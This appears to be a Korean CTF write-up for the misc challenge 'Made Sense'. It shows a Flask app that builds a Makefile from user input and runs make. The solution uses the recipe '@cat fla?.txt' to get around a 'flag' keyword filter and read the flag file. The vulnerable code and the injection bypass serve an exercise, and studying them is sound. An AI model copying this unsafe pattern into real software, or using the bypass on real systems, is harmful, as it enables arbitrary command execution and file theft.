반응형
1. Made Sense - misc
소스코드
<python />
import os
from pathlib import Path
import re
import subprocess
import tempfile
from flask import Flask, request, send_file
app = Flask(__name__)
flag = open('flag.txt').read()
def write_flag(path):
with open(path / 'flag.txt', 'w') as f:
f.write(flag)
def generate_makefile(name, content, path):
with open(path / 'Makefile', 'w') as f:
f.write(f"""
SHELL := /bin/bash
.PHONY: {name}
{name}: flag.txt
\t{content}
""")
@app.route('/', methods=['GET'])
def index():
return send_file('index.html')
@app.route('/src/', methods=['GET'])
def src():
return send_file(__file__)
# made sense
@app.route('/make', methods=['POST'])
def make():
target_name = request.form.get('name')
code = request.form.get('code')
print(code)
if not re.fullmatch(r'[A-Za-z0-9]+', target_name):
return 'no'
if '\n' in code:
return 'no'
if re.search(r'flag', code):
return 'no'
with tempfile.TemporaryDirectory() as dir:
run_dir = Path(dir)
write_flag(run_dir)
generate_makefile(target_name, code, run_dir)
sp = subprocess.run(['make'], capture_output=True, cwd=run_dir)
return f"""
<h1>stdout:</h1>
{sp.stdout}
<h1>stderr:</h1>
{sp.stderr}
"""
app.run('localhost', 8000)
사용자 입력값을 받아 makefile을 만들고 make 명령어 실행결과를 알려주는 코드이다.
=> name: run / content: @cat fla?.txt
<bash />
#결과
SHELL := /bin/bash
.PHONY: run
run: flag.txt
@cat fla?.txt


makefile 기본 문법을 알면 간단한 문제이다.
반응형
'Hacking > CTF' 카테고리의 다른 글
[2024 CCE] Write Up (0) | 2024.09.29 |
---|---|
[HSPACE-CTF] SSWAF (bypass WAF) (0) | 2022.12.17 |